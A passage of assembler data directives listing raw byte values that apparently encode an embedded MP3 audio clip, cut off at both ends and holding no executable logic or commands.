233,156,82,187,76,169,233,185,83,197,206,216,167,178,93,198 + db 255,227,20,196,183,7,64,90,227,79,74,0,2,171,112,223 + db 254,161,108,4,135,207,67,12,21,2,73,244,220,226,65,22 + db 12,111,168,199,116,113,111,192,0,6,192,115,255,141,0,81 + db 255,227,20,196,189,19,192,214,231,183,152,136,0,245,112,204 + db 197,11,69,255,52,44,31,119,255,255,255,251,185,111,3,51 + db 67,90,73,28,181,39,42,72,0,0,19,247,89,71,49,243 + db 255,227,20,196,145,19,129,18,231,163,152,136,0,255,239,97 + db 64,140,0,188,242,27,132,90,125,192,203,221,3,51,177,4 + db 89,54,197,115,54,181,67,152,182,255,98,234,238,25,238,67 + db 255,227,20,196,102,5,192,146,251,33,202,40,0,58,213,252 + db 223,253,255,87,49,215,84,170,31,22,99,102,135,107,107,166 + db 90,92,8,128,0,16,221,75,138,41,74,190,218,35,241,248 + db 255,227,20,196,114,6,128,106,231,119,72,0,0,25,169,44 + db 8,241,4,1,224,81,196,37,82,13,56,81,74,45,93,150 + db 39,113,228,158,64,171,28,50,137,85,31,189,77,85,123,61 + db 255,227,20,196,123,16,64,182,191,223,140,49,1,116,125,38 + db 121,1,71,207,157,253,215,23,16,140,64,143,31,134,143,251 + db 253,126,118,72,37,209,129,137,98,30,50,68,11,44,44,184 + db 255,227,20,196,93,19,185,18,219,223,140,65,1,197,202,179 + db 217,111,255,253,63,219,233,9,182,13,0,19,7,24,148,216 + db 249,109,160,35,194,237,215,179,255,213,197,15,39,87,254,157 + db 255,227,20,196,49,6,0,6,219,181,193,0,0,164,0,6 + db 51,1,108,248,100,233,71,205,72,238,163,122,232,185,203,75 + db 143,164,164,222,115,232,4,62,37,96,203,34,229,233,26,163 + db 255,227,20,196,60,5,192,2,163,92,0,0,0,139,125,21 + db 156,138,238,90,125,177,155,61,223,247,209,94,202,255,4,0 + db 129,50,200,209,200,51,93,166,43,161,212,213,89,186,182,251 + db 255,227,20,196,72,6,192,14,179,54,24,0,0,105,223,86 + db 251,125,168,95,169,127,185,128,64,0,77,1,4,130,225,80 + db 224,113,9,96,68,128,136,76,231,84,170,183,213,255,253,58 + db 255,227,20,196,80,6,192,10,159,130,24,0,0,67,223,32 + db 4,14,20,225,113,0,1,118,218,54,232,5,108,185,172,78 + db 250,106,103,215,255,238,255,209,7,160,146,168,72,179,72,204 + db 255,227,20,196,88,6,192,10,147,76,24,0,0,160,136,40 + db 178,70,218,170,152,237,136,121,143,253,222,255,253,9,254,159 + db 192,0,78,0,216,141,37,150,183,57,162,32,18,144,242,77 + db 255,227,20,196,96,7,0,2,163,84,0,0,0,175,99,55 + db 111,235,244,255,247,250,253,107,128,66,129,64,193,96,58,0 + db 161,117,135,195,13,125,129,242,62,24,173,30,93,118,255,250 + db 255,227,20,196,103,6,64,2,167,46,0,0,0,59,47,127 + db 95,8,195,140,24,8,24,10,3,57,77,97,213,130,188,26 + db 146,248,136,142,223,254,173,254,246,39,16,41,8,17,208,196 + db 255,227,20,196,113,6,192,2,183,86,0,0,2,177,129,138 + db 9,7,130,164,66,172,254,228,110,167,217,239,80,133,86,255 + db 187,255,71,8,82,2,210,24,76,164,73,135,4,160,225,51 + db 255,227,20,196,121,6,192,2,163,78,0,0,0,61,201,1 + db 160,251,212,141,205,162,143,221,255,117,42,232,63,87,2,185 + db 43,130,219,120,7,207,178,135,31,68,82,109,16,65,118,123 + db 255,227,20,196,129,7,0,34,159,74,73,134,0,149,253,91 + db 43,220,132,198,122,31,215,178,181,127,5,199,41,182,204,0 + db 50,84,239,247,146,113,11,214,230,165,226,85,139,191,239,234 + db 255,227,20,196,136,6,64,30,159,74,24,130,0,145,93,234 + db 125,223,213,253,31,15,101,5,37,0,2,54,205,7,106,177 + db 232,42,14,161,83,67,30,212,59,96,246,126,223,237,213,223 + db 255,227,20,196,146,7,0,42,163,46,24,68,32,234,111,233 + db 98,27,169,181,169,1,0,4,46,60,109,185,29,26,223,209 + db 127,68,252,237,225,84,122,203,220,114,216,30,71,113,25,241 + db 255,227,20,196,153,7,128,50,155,34,49,134,4,72,51,98 + db 227,233,12,62,22,124,215,217,250,120,59,2,1,16,83,15 + db 140,229,189,95,127,164,139,143,29,63,255,255,255,229,228,193 + db 255,227,20,196,158,7,192,2,187,142,0,0,0,222,153,66 + db 102,191,249,96,8,16,6,16,38,86,235,82,42,143,107,13 + db 0,1,238,166,187,0,174,91,49,220,203,1,32,212,40,145 + db 255,227,20,196,162,7,128,10,167,102,48,0,0,200,66,163 + db 106,71,217,64,237,35,142,149,29,46,97,197,71,121,60,17 + db 15,168,237,169,159,47,64,224,236,29,0,158,55,143,255,63 + db 255,227,20,196,167,7,128,18,131,95,73,0,0,44,155,191 + db 169,179,232,28,159,255,255,251,29,100,243,230,134,134,127,246 + db 163,226,151,53,205,175,128,111,129,150,186,193,191,157,86,6 + db 255,227,20,196,172,19,129,122,179,133,143,89,2,158,189,241 + db 159,120,57,92,118,124,63,194,70,173,177,234,224,163,120,245 + db 220,164,101,102,203,107,101,78,242,170,106,211,100,174,116,129 + db 255,227,20,196,129,19,193,110,227,181,143,89,64,57,252,193 + db 22,150,102,189,245,10,155,215,248,251,255,255,231,222,245,143 + db 112,230,166,153,150,48,199,248,208,225,31,148,45,210,197,26 + db 255,227,20,196,85,19,1,98,247,33,140,120,0,204,250,11 + db 141,216,192,137,179,130,76,26,125,174,251,122,127,21,130,30 + db 161,1,63,80,114,95,156,21,17,223,169,8,182,34,110,157 + db 255,227,20,196,44,6,64,167,7,33,197,16,0,127,255,43 + db 255,231,49,207,82,26,243,18,118,49,78,41,179,108,202,240 + db 73,137,181,113,111,86,2,60,69,209,254,70,214,239,39,37 + db 255,227,20,196,54,5,128,142,247,32,1,210,56,27,142,10 + db 7,122,92,22,3,19,212,157,132,145,121,163,127,152,166,204 + db 100,74,254,114,189,23,107,63,246,209,83,121,234,56,123,205 + db 255,227,20,196,67,6,64,122,227,33,79,24,0,59,54,26 + db 82,191,255,246,131,239,254,28,74,4,226,21,174,72,216,216 + db 240,17,165,94,145,111,201,255,240,207,252,75,140,82,117,185 + db 255,227,20,196,77,11,193,114,235,33,139,56,0,210,68,18 + db 1,225,190,39,164,131,95,148,159,149,142,254,164,59,232,81 + db 48,252,239,8,235,231,234,243,208,56,210,164,55,148,21,255 + db 255,227,20,196,65,6,128,130,251,33,203,16,0,31,252,73 + db 255,64,247,36,252,175,255,252,73,0,31,69,189,29,135,22 + db 186,178,19,21,211,110,224,227,230,73,64,84,3,188,5,3 + db 255,227,20,196,74,6,48,226,251,32,3,68,53,2,0,0 + db 32,0,16,133,44,78,60,14,16,84,46,185,97,172,251,220 + db 75,63,252,68,44,63,8,199,130,175,243,55,161,18,219,189 + db 255,227,20,196,84,5,192,206,247,32,3,202,44,167,14,195 + db 244,241,0,90,93,127,253,250,120,77,86,86,63,255,61,144 + db 248,67,201,88,105,190,31,26,30,15,139,30,105,99,95,255 + db 255,227,20,196,96,6,64,102,223,33,79,0,0,56,222,19 + db 98,145,188,43,146,40,19,72,125,151,186,64,123,22,170,248 + db 251,248,34,28,149,86,248,249,197,25,110,126,223,107,145,220 + db 255,227,20,196,106,17,129,98,227,185,140,64,0,66,216,253 + db 220,40,3,59,119,255,255,255,255,250,104,87,12,3,204,183 + db 16,219,187,218,213,133,36,13,163,138,51,90,24,83,178,63 + db 255,227,20,196,71,6,184,98,239,33,207,0,1,255,255,175 + db 212,71,18,137,120,160,10,18,110,40,7,2,23,80,1,30 + db 161,223,88,127,255,214,127,19,255,212,49,95,83,3,154,216 + db 255,227,20,196,79,6,0,98,235,32,11,196,44,132,20,215 + db 67,193,26,246,25,202,191,110,183,104,239,203,107,6,114,127 + db 51,222,127,154,85,92,27,157,212,33,4,125,13,22,234,3 + db 255,227,20,196,90,5,192,98,227,36,11,196,44,119,101,121 + db 221,125,218,57,221,127,0,33,6,176,254,107,82,229,96,157 + db 132,175,168,30,71,46,234,142,235,255,255,254,175,255,215,3 + db 255,227,20,196,102,6,64,142,243,32,1,196,20,0,229,91 + db 165,101,138,135,131,69,180,81,230,96,135,240,135,246,105,255 + db 255,253,168,250,3,200,175,53,128,136,108,190,33,22,142,47 + db 255,227,20,196,112,6,128,146,239,32,2,142,20,82,7,131 + db 83,152,115,100,242,156,206,93,242,135,61,78,204,255,34,19 + db 61,65,116,110,158,0,113,108,197,156,47,10,102,232,4,7 + db 255,227,20,196,121,6,64,122,235,32,3,206,40,242,167,161 + db 155,209,133,188,168,114,144,211,105,96,193,149,247,131,71,123 + db 196,227,232,18,29,59,230,86,196,255,226,7,68,172,150,52 + db 255,227,20,196,131,6,64,90,235,38,3,78,14,126,88,117 + db 73,32,3,164,114,153,88,31,71,131,235,58,104,5,21,39 + db 233,21,31,245,77,122,249,110,75,135,180,127,1,145,32,81 + db 255,227,20,196,141,5,192,110,235,36,3,196,40,248,248,109 + db 92,213,97,24,60,171,46,172,54,119,90,255,150,126,71,119 + db 158,226,159,255,255,43,242,250,101,121,170,16,213,130,139,209 + db 255,227,20,196,153,7,128,142,239,32,83,202,160,201,57,54 + db 136,88,116,113,6,9,129,77,48,236,106,59,13,212,208,70 + db 204,137,117,130,200,147,19,164,151,231,39,94,77,160,234,110 + db 255,227,20,196,158,7,128,230,247,32,2,132,56,171,90,157 + db 148,186,21,126,114,191,47,206,169,63,247,242,234,2,91,15 + db 57,90,214,170,232,110,203,115,128,227,68,146,26,79,162,20 + db 255,227,20,196,163,6,192,126,243,32,2,216,44,74,76,142 + db 98,81,150,215,63,74,170,170,93,77,109,150,215,254,191,230 + db 44,15,215,99,83,255,252,66,55,150,107,191,168,33,174,173 + db 255,227,20,196,171,6,192,158,235,32,2,26,36,154,214,197 + db 137,91,126,157,57,146,253,191,245,62,159,244,52,9,183,158 + db 20,254,116,24,21,19,70,20,24,2,55,48,167,57,149,214 + db 255,227,20,196,179,7,64,98,227,55,71,0,2,205,26,185 + db 140,76,232,69,249,112,127,220,105,41,252,89,177,190,128,248 + db 17,138,104,108,160,10,12,252,120,190,167,233,213,255,254,37 + db 255,227,20,196,185,14,129,106,235,33,143,104,0,185,97,46 + db 21,172,137,156,167,92,177,127,233,83,180,98,110,54,119,0 + db 125,15,225,62,97,74,248,149,191,255,255,255,255,158,171,198 + db 255,227,20,196,162,11,129,42,251,33,143,104,0,44,2,208 + db 156,22,47,53,62,122,124,153,243,154,195,245,56,31,16,1 + db 6,159,255,245,28,15,137,202,59,38,83,139,160,16,229,229 + db 255,227,20,196,151,6,64,94,247,33,207,0,0,130,96,5 + db 6,220,169,57,64,70,67,121,149,106,82,46,86,230,47,255 + db 255,163,2,192,71,216,2,18,124,165,220,116,161,40,204,243 + db 255,227,20,196,161,7,192,142,247,32,58,74,164,66,103,255 + db 255,253,226,77,96,136,218,255,255,175,146,215,199,212,69,35 + db 84,36,41,0,17,107,255,255,234,118,85,220,124,247,197,159 + db 255,227,20,196,165,8,64,142,247,32,3,78,20,132,254,190 + db 86,191,12,166,35,62,105,201,162,0,4,202,160,66,75,214 + db 225,240,125,44,37,105,209,252,152,63,56,233,177,48,192,29 + db 255,227,20,196,167,6,128,122,235,32,3,196,48,143,134,225 + db 226,120,146,124,103,8,98,72,39,147,35,234,172,225,103,68 + db 196,206,185,159,255,222,189,61,51,249,165,51,255,255,254,170 + db 255,227,20,196,176,7,192,86,239,32,0,76,0,230,216,205 + db 63,244,203,32,44,42,159,242,118,173,120,189,206,1,107,133 + db 140,189,161,175,28,207,60,59,40,212,63,184,70,206,155,70 + db 255,227,20,196,180,6,128,114,243,32,2,204,12,31,22,27 + db 200,96,29,184,146,90,211,55,153,209,6,122,79,31,41,126 + db 200,90,175,225,241,92,241,93,69,206,202,183,108,212,168,95 + db 255,227,20,196,189,6,192,90,235,38,43,204,98,83,113,196 + db 20,221,215,31,236,239,255,149,162,101,175,252,4,55,97,20 + db 122,156,128,67,115,137,1,77,212,5,61,89,29,63,254,141 + db 255,227,20,196,197,6,192,66,211,39,71,0,2,88,179,241 + db 47,248,69,83,45,190,28,137,137,90,231,143,39,0,159,91 + db 202,39,158,163,90,187,116,127,21,34,89,158,160,105,9,88 + db 255,227,20,196,205,18,193,122,231,173,140,90,34,18,2,174 + db 21,116,107,153,126,245,37,250,148,94,182,190,79,236,48,214 + db 166,76,139,150,198,37,215,169,163,72,255,194,1,18,41,108 + db 255,227,20,196,165,18,129,198,243,33,143,88,1,150,9,128 + db 24,87,31,48,160,225,219,211,155,199,20,76,7,26,163,56 + db 207,255,255,255,252,251,138,127,207,144,211,190,172,192,56,3 + db 255,227,20,196,126,6,64,135,7,33,197,40,0,148,153,35 + db 148,50,70,177,139,150,10,229,30,0,107,168,255,255,255,255 + db 243,201,64,4,132,27,91,21,149,126,240,76,28,69,114,135 + db 255,227,20,196,136,5,192,106,239,32,19,204,40,69,86,236 + db 121,139,40,141,255,253,142,183,255,111,253,31,188,3,255,132 + db 152,101,157,157,255,243,243,61,90,147,92,248,233,203,144,180 + db 255,227,20,196,148,9,128,2,227,140,0,0,0,64,243,69 + db 24,253,150,56,149,148,17,191,250,7,232,13,184,96,197,21 + db 88,81,195,82,102,24,31,65,104,92,49,227,232,100,9,140 + db 255,227,20,196,145,8,0,106,235,32,1,216,0,10,63,82 + db 106,233,46,84,13,193,130,83,99,213,211,164,115,222,255,33 + db 212,49,127,110,179,18,83,210,36,253,19,118,181,131,168,193 + db 255,227,20,196,148,7,64,90,239,32,3,204,16,238,101,64 + db 8,22,250,242,86,89,239,172,15,203,63,255,255,70,143,111 + db 64,21,251,140,23,244,73,140,252,196,48,63,92,136,109,109 + db 255,227,20,196,154,7,64,66,231,78,3,30,10,52,96,246 + db 79,127,255,110,105,178,90,255,111,64,81,189,3,75,226,96 + db 194,119,41,1,225,255,112,212,32,100,223,206,145,16,111,107 + db 255,227,20,196,160,7,193,38,231,37,65,24,1,37,255,255 + db 175,94,103,198,157,124,198,3,219,158,248,76,39,222,165,6 + db 223,18,4,49,220,225,84,182,127,235,236,209,248,202,151,28 + db 255,227,20,196,164,11,128,210,251,33,136,56,0,124,74,252 + db 64,156,190,235,49,64,131,232,229,80,28,127,168,49,189,69 + db 158,160,222,91,8,71,71,204,64,127,62,149,3,34,103,114 + db 255,227,20,196,153,7,192,174,251,33,205,72,0,128,12,37 + db 99,78,252,182,163,223,110,239,250,196,243,128,163,142,8,119 + db 126,41,46,55,6,52,119,50,0,64,2,6,35,181,6,16 + db 255,227,20,196,157,7,0,162,255,32,42,206,164,112,44,8 + db 224,79,221,179,233,49,38,233,115,202,83,119,237,217,151,239 + db 171,248,69,132,212,249,132,158,97,11,178,146,59,109,32,23 + db 255,227,20,196,164,7,0,170,251,32,58,210,192,47,238,242 + db 69,127,108,91,169,223,70,141,122,255,8,2,161,47,40,50 + db 210,155,130,244,213,209,115,0,248,11,143,115,194,119,234,73 + db 255,227,20,196,171,6,192,166,243,32,11,20,40,241,76,254 + db 223,254,67,49,128,135,232,145,121,55,222,88,4,93,107,57 + db 204,33,33,103,183,200,47,194,189,68,190,87,247,255,91,191 + db 255,227,20,196,179,6,192,170,235,32,11,202,48,255,89,195 + db 176,135,12,3,212,96,1,27,164,224,216,114,212,240,230,74 + db 14,182,123,49,194,10,232,163,97,252,159,255,246,232,255,250 + db 255,227,20,196,187,8,64,90,227,38,10,78,42,212,130,226 + db 114,63,228,20,77,127,183,190,43,113,234,223,8,113,25,74 + db 231,53,210,132,155,103,226,177,150,113,19,214,36,211,137,113 + db 255,227,20,196,189,8,128,74,231,38,0,82,0,95,167,252 + db 198,141,63,42,40,56,60,156,21,191,154,10,141,118,44,139 + db 175,80,49,42,3,181,29,172,53,82,190,123,251,142,203,127 + db 255,227,20,196,190,7,0,134,227,32,3,214,12,193,52,69 + db 122,17,150,75,36,109,20,64,128,88,70,52,141,65,234,214 + db 152,161,219,41,14,173,85,164,98,58,135,19,83,218,188,43 + db 255,227,20,196,197,7,0,130,235,36,4,78,20,87,191,128 + db 82,223,235,4,129,49,191,31,220,28,35,30,207,39,166,16 + db 38,80,0,180,238,204,67,129,1,115,144,137,241,97,129,154 + db 255,227,20,196,204,8,128,130,231,38,3,196,20,223,46,126 + db 188,185,247,136,14,122,191,55,196,2,247,224,114,106,172,66 + db 201,0,152,186,214,100,228,45,34,31,110,64,56,59,127,209 + db 255,227,20,196,205,8,192,130,231,36,83,196,104,63,106,107 + db 201,106,195,68,22,100,33,61,145,250,191,248,98,190,255,121 + db 92,7,60,120,250,3,192,180,251,255,79,98,69,82,5,61 + db 255,227,20,196,205,9,0,126,235,32,2,222,4,163,244,134 + db 94,81,255,87,231,104,110,163,182,197,162,15,14,23,171,98 + db 67,253,254,235,52,173,156,38,124,252,85,248,33,151,212,24 + db 255,227,20,196,204,8,128,98,231,46,1,134,16,195,24,140 + db 252,191,204,5,5,221,69,96,184,150,102,144,54,123,72,88 + db 0,142,126,230,19,9,150,36,235,212,44,122,3,196,206,124 + db 255,227,20,196,205,9,0,2,219,182,0,0,0,5,0,209 + db 86,193,81,64,115,231,1,179,113,207,82,20,179,94,235,170 + db 238,183,145,234,104,225,248,173,69,115,164,99,94,197,118,82 + db 255,227,20,196,204,9,192,150,239,32,8,76,12,175,86,167 + db 215,171,10,56,17,8,213,17,32,185,133,212,72,246,48,55 + db 188,96,8,4,9,185,245,123,188,24,245,190,167,84,234,223 + db 255,227,20,196,200,9,192,170,251,32,59,12,196,40,233,71 + db 32,191,248,216,90,124,248,13,153,187,28,99,114,96,240,219 + db 53,40,148,2,182,252,48,175,43,121,190,111,151,239,232,244 + db 255,227,20,196,196,5,128,130,243,32,19,208,40,53,67,31 + db 146,68,220,82,209,242,179,149,80,9,225,80,144,8,42,2 + db 108,85,222,72,243,147,150,202,186,215,150,197,64,92,236,183 + db 255,227,20,196,209,9,192,170,231,32,3,214,12,220,189,203 + db 101,130,95,198,180,93,230,16,91,221,52,34,136,88,177,192 + db 137,48,147,180,12,68,11,134,136,135,78,106,59,0,152,12 + db 255,227,20,196,205,7,192,146,251,32,1,204,16,165,6,113 + db 71,40,45,17,132,67,13,142,105,231,212,125,9,244,220,217 + db 191,70,130,143,44,172,80,45,24,49,223,237,100,25,54,64 + db 255,227,20,196,209,9,192,114,231,54,1,210,4,197,104,173 + db 70,127,244,239,222,234,52,81,128,107,248,153,81,16,141,69 + db 58,209,197,134,9,38,86,22,155,58,215,100,184,205,128,182 + db 255,227,20,196,205,8,192,150,235,48,2,208,20,145,134,26 + db 159,74,24,216,168,218,140,130,123,13,101,173,235,152,229,83 + db 245,102,190,57,119,150,117,102,174,54,174,127,109,238,206,25 + db 255,227,20,196,205,8,129,54,239,32,58,68,140,111,47,255 + db 251,25,158,145,105,35,184,174,215,139,0,41,14,134,219,133 + db 72,127,111,52,64,179,242,227,173,216,59,91,70,133,64,2 + db 255,227,20,196,206,9,64,50,223,55,66,0,2,101,112,194 + db 224,213,255,174,172,157,103,101,127,3,202,7,254,173,156,218 + db 33,102,150,68,138,220,22,37,88,208,136,212,247,255,255,149 + db 255,227,20,196,204,19,105,202,227,33,143,144,1,37,254,143 + db 215,4,70,117,119,136,236,82,7,201,0,1,51,70,207,51 + db 53,88,177,139,127,29,28,131,224,221,59,149,32,39,8,207 + db 255,227,20,196,161,19,65,18,239,33,143,192,0,120,67,36 + db 160,237,132,10,54,212,243,225,205,102,186,33,7,206,99,196 + db 96,67,65,176,15,40,76,185,83,130,197,15,121,162,102,36 + db 255,227,20,196,119,6,128,102,251,33,203,0,0,20,101,98 + db 127,121,104,119,151,119,132,51,84,85,233,0,0,148,175,161 + db 98,178,113,57,65,186,251,47,5,76,151,41,61,16,166,195 + db 255,227,20,196,128,6,192,82,223,39,73,0,0,69,209,69 + db 71,7,164,45,142,36,196,41,102,15,97,115,147,177,82,236 + db 209,31,226,214,118,237,122,209,98,127,187,166,174,111,135,251 + db 255,227,20,196,136,17,128,210,183,221,140,64,0,246,105,247 + db 191,139,143,136,255,158,22,206,144,63,112,75,173,216,74,8 + db 0,226,205,213,6,169,34,56,169,217,45,119,124,175,247,255 + db 255,227,20,196,101,19,193,218,215,229,140,64,1,254,191,17 + db 227,18,65,130,132,32,62,34,64,170,105,199,141,140,250,94 + db 223,186,139,81,245,87,255,254,175,11,218,73,37,64,23,233 + db 255,227,20,196,57,6,0,2,227,183,192,0,0,101,17,112 + db 69,200,150,101,21,197,209,250,182,213,191,223,77,250,106,250 + db 191,160,202,44,19,21,52,9,138,133,77,31,32,64,208,145 + db 255,227,20,196,68,6,128,10,187,94,24,0,0,134,138,20 + db 190,125,182,232,253,30,175,215,66,235,83,42,134,164,101,237 + db 64,116,68,179,135,80,171,238,98,93,230,213,114,189,127,228 + db 255,227,20,196,77,6,192,10,183,94,16,0,2,8,213,90 + db 70,224,77,68,6,197,8,12,22,98,6,77,24,20,60,254 + db 239,245,122,247,211,186,137,215,245,255,138,128,16,96,240,130 + db 255,227,20,196,85,6,128,14,159,40,24,0,0,240,96,232 + db 226,142,31,65,228,178,49,47,223,245,85,119,250,23,163,241 + db 223,245,127,86,10,36,80,56,227,129,112,18,77,86,210,85 + db 255,227,20,196,94,6,128,46,159,42,8,68,4,54,198,206 + db 163,230,58,81,209,246,215,245,255,244,255,77,184,3,146,128 + db 200,151,253,143,106,206,207,98,238,14,176,83,255,211,252,155 + db 255,227,20,196,103,6,192,2,171,52,0,0,0,167,157,91 + db 169,238,163,229,82,129,144,39,7,136,44,36,196,104,44,18 + db 88,142,25,161,247,219,45,177,75,252,157,26,127,244,127,224 + db 255,227,20,196,111,7,0,50,171,36,48,134,0,128,31,78 + db 3,29,180,78,7,107,6,160,84,130,66,211,84,218,155,19 + db 236,246,222,173,180,211,95,22,191,140,1,0,5,193,199,6 + db 255,227,20,196,118,6,192,10,167,54,48,0,0,11,136,0 + db 7,8,4,74,54,42,191,196,224,69,255,255,244,57,88,92 + db 167,5,1,34,5,18,166,75,99,13,173,221,204,44,72,56 + db 255,227,20,196,126,6,192,2,191,62,0,0,2,104,88,137 + db 251,30,202,101,255,95,234,28,180,45,63,171,1,138,199,72 + db 166,204,177,14,60,20,8,0,3,24,52,226,251,96,176,181 + db 255,227,20,196,134,7,0,6,151,54,72,0,0,175,2,64 + db 130,203,109,3,129,32,241,19,57,211,33,210,83,196,247,173 + db 160,130,5,3,212,236,93,255,255,239,74,45,55,67,145,203 + db 255,227,20,196,141,6,192,30,143,42,64,130,0,134,41,255 + db 69,127,254,28,178,252,104,12,16,135,247,77,134,232,77,6 + db 89,225,96,66,77,111,99,161,102,180,202,194,112,154,254,167 + db 255,227,20,196,149,7,64,2,195,134,0,0,2,173,5,39 + db 158,232,53,22,82,214,201,173,7,162,221,6,30,136,166,179 + db 99,84,68,17,76,177,218,130,1,88,74,47,212,131,134,87 + db 255,227,20,196,155,7,128,66,167,85,70,0,0,54,36,211 + db 90,140,99,105,177,60,201,104,155,55,101,8,246,96,226,69 + db 2,102,105,224,4,77,195,125,81,33,207,32,1,159,48,50 + db 255,227,20,196,160,15,1,10,195,191,136,48,0,242,5,110 + db 95,253,126,249,246,93,83,27,182,117,47,123,162,183,196,215 + db 55,15,4,255,86,167,61,49,108,148,88,91,105,215,85,177 + db 255,227,20,196,135,19,129,222,243,33,134,104,0,230,142,151 + db 171,52,120,118,61,52,223,45,39,127,219,236,203,189,202,8 + db 21,226,103,255,255,255,250,172,139,52,66,203,84,68,180,84 + db 255,227,20,196,92,17,129,222,255,33,130,88,0,159,230,150 + db 193,114,24,55,0,51,112,252,88,63,4,148,105,47,255,255 + db 191,232,228,127,254,194,227,225,17,83,74,141,107,209,229,74 + db 255,227,20,196,57,5,192,75,11,33,194,0,0,45,226,7 + db 127,255,254,249,245,4,64,159,211,2,229,168,177,14,209,159 + db 41,123,12,44,193,208,119,255,255,54,241,11,2,175,120,119 + db 255,227,20,196,69,5,128,58,247,32,99,12,64,128,124,100 + db 244,234,95,241,27,71,67,92,68,21,112,107,255,253,192,168 + db 45,91,187,252,191,80,99,11,161,8,126,173,122,234,42,249 + db 255,227,20,196,82,5,192,103,7,32,72,70,72,151,250,75 + db 146,255,250,236,215,46,156,175,255,95,223,203,127,112,184,219 + db 39,54,83,174,191,167,239,100,98,127,178,34,221,154,243,20 + db 255,227,20,196,94,6,0,126,255,32,88,70,52,180,193,48 + db 156,37,27,13,253,170,140,97,87,26,154,112,78,96,5,255 + db 27,190,126,44,48,153,81,201,127,254,153,232,97,134,142,34 + db 255,227,20,196,105,6,0,58,239,32,88,76,0,24,88,230 + db 19,255,167,201,206,28,57,48,125,223,47,227,190,255,124,50 + db 161,253,22,163,129,72,171,167,6,195,158,26,136,90,73,71 + db 255,227,20,196,116,6,192,58,231,37,76,0,0,115,72,200 + db 91,167,106,28,40,180,233,244,210,10,134,231,111,35,159,242 + db 206,75,194,209,8,76,165,110,76,86,176,191,215,235,254,255 + db 255,227,20,196,124,14,193,226,251,33,136,56,0,25,15,250 + db 131,17,250,255,229,47,249,191,202,39,212,79,135,37,21,12 + db 39,22,204,241,226,87,228,160,64,77,14,196,93,110,255,255 + db 255,227,20,196,100,15,65,107,11,33,131,72,0,223,246,243 + db 223,16,130,171,13,73,127,144,181,211,177,12,94,76,56,45 + db 45,27,85,226,114,31,144,143,46,255,236,97,204,249,74,140 + db 255,227,20,196,74,6,65,51,19,33,193,16,0,255,242,5 + db 2,113,67,165,33,165,191,236,150,23,48,101,214,172,65,102 + db 7,88,229,172,28,63,219,171,168,80,177,149,229,208,249,160 + db 255,227,20,196,84,6,0,87,3,32,0,70,4,121,159,245 + db 95,250,142,141,73,125,103,255,255,255,253,127,149,5,13,250 + db 145,63,232,164,66,72,133,53,178,255,246,55,253,20,74,7 + db 255,227,20,196,95,6,128,98,255,32,11,12,8,122,63,255 + db 255,167,212,85,200,196,138,175,218,177,211,86,161,171,223,222 + db 247,247,182,190,241,169,177,169,210,249,239,244,255,72,202,76 + db 255,227,20,196,104,6,128,99,11,32,64,18,128,212,49,30 + db 8,16,145,73,89,22,61,52,77,222,10,193,225,160,67,183 + db 85,52,218,180,191,208,221,53,80,244,43,66,228,186,11,101 + db 255,227,20,196,113,5,192,203,15,32,40,14,132,26,149,4 + db 29,130,56,173,13,212,234,225,198,224,85,255,225,181,168,172 + db 156,162,5,151,94,219,207,27,0,211,157,127,228,63,252,132 + db 255,227,20,196,125,6,64,246,255,32,80,4,224,118,238,164 + db 12,101,51,45,207,160,171,195,170,185,131,0,19,89,142,167 + db 242,183,203,3,79,44,191,255,255,79,228,5,77,43,169,206 + db 255,227,20,196,135,6,192,110,223,33,79,0,0,115,157,10 + db 4,19,22,34,185,200,117,69,66,29,255,253,249,237,120,77 + db 128,33,47,133,160,126,102,207,18,192,120,62,7,162,145,36 + db 255,227,20,196,143,13,65,26,251,33,137,104,0,104,45,51 + db 255,111,255,209,155,207,234,24,44,163,255,158,196,199,130,135 + db 133,185,225,164,255,211,255,235,188,233,252,161,66,14,34,127 + db 255,227,20,196,125,6,192,218,247,33,203,16,0,162,144,73 + db 80,217,182,227,108,189,196,38,88,58,204,10,183,51,255,255 + db 255,253,124,74,11,1,115,213,40,59,46,207,10,58,48,179 + db 255,227,20,196,133,6,128,82,243,32,16,196,72,82,214,127 + db 25,114,238,59,157,84,53,82,228,242,76,250,98,72,10,191 + db 117,187,148,28,192,179,255,106,42,127,223,235,62,245,39,254 + db 255,227,20,196,142,6,185,218,247,32,40,7,49,102,110,120 + db 190,234,77,5,15,18,138,207,127,212,203,83,85,64,221,230 + db 79,90,102,31,41,54,95,89,229,164,99,83,98,64,236,33 + db 255,227,20,196,150,6,57,187,7,32,56,4,245,0,192,108 + db 105,117,98,150,56,129,19,220,19,226,68,47,149,157,86,65 + db 160,143,205,129,200,252,113,15,251,84,255,63,5,136,83,20 + db 255,227,20,196,160,5,1,203,15,32,40,4,245,219,132,195 + db 134,87,208,193,18,198,180,115,56,211,185,250,244,58,61,159 + db 198,12,215,250,47,153,145,14,8,118,255,219,255,244,7,255 + db 255,227,20,196,175,7,64,74,243,33,79,0,0,246,50,92 + db 238,71,236,242,223,223,241,161,159,16,150,48,104,65,168,10 + db 191,255,247,255,83,222,160,203,191,255,147,199,249,187,138,10 + db 255,227,20,196,181,16,1,226,247,33,143,104,0,37,194,0 + db 216,23,255,3,157,255,210,130,194,50,128,234,27,255,209,200 + db 0,73,165,16,160,160,145,3,20,176,54,236,68,218,219,250 + db 255,227,20,196,152,17,1,219,7,33,134,64,1,228,127,246 + db 106,136,144,207,255,229,191,249,166,153,14,69,105,54,63,89 + db 183,73,243,30,123,235,252,195,127,125,99,132,0,0,64,198 + db 255,227,20,196,119,5,128,211,23,33,194,16,0,176,127,176 + db 71,255,168,34,56,48,200,95,175,175,200,73,213,226,170,8 + db 148,61,148,239,10,171,119,158,144,227,86,84,187,141,7,161 + db 255,227,20,196,132,5,129,83,3,32,56,20,204,69,176,168 + db 65,21,189,209,89,93,25,116,189,213,227,183,184,23,55,82 + db 40,58,127,171,106,87,177,232,160,57,104,191,55,90,253,122 + db 255,227,20,196,145,5,192,87,15,32,0,70,40,156,194,75 + db 193,41,122,126,159,254,255,71,232,17,255,255,245,140,148,4 + db 141,23,156,62,174,218,148,99,226,133,1,18,79,44,103,13 + db 255,227,20,196,157,6,192,66,251,32,8,82,0,98,95,249 + db 209,16,105,159,255,240,212,183,17,60,4,131,7,138,99,200 + db 164,113,164,13,94,105,204,113,85,113,90,93,244,127,255,40 + db 255,227,20,196,165,10,64,126,251,33,79,24,0,207,255,235 + db 12,0,0,241,115,92,75,96,249,19,6,115,216,61,64,128 + db 56,204,170,197,105,127,232,127,255,242,206,254,207,233,87,171 + db 255,227,20,196,159,11,129,15,19,33,137,40,0,30,181,153 + db 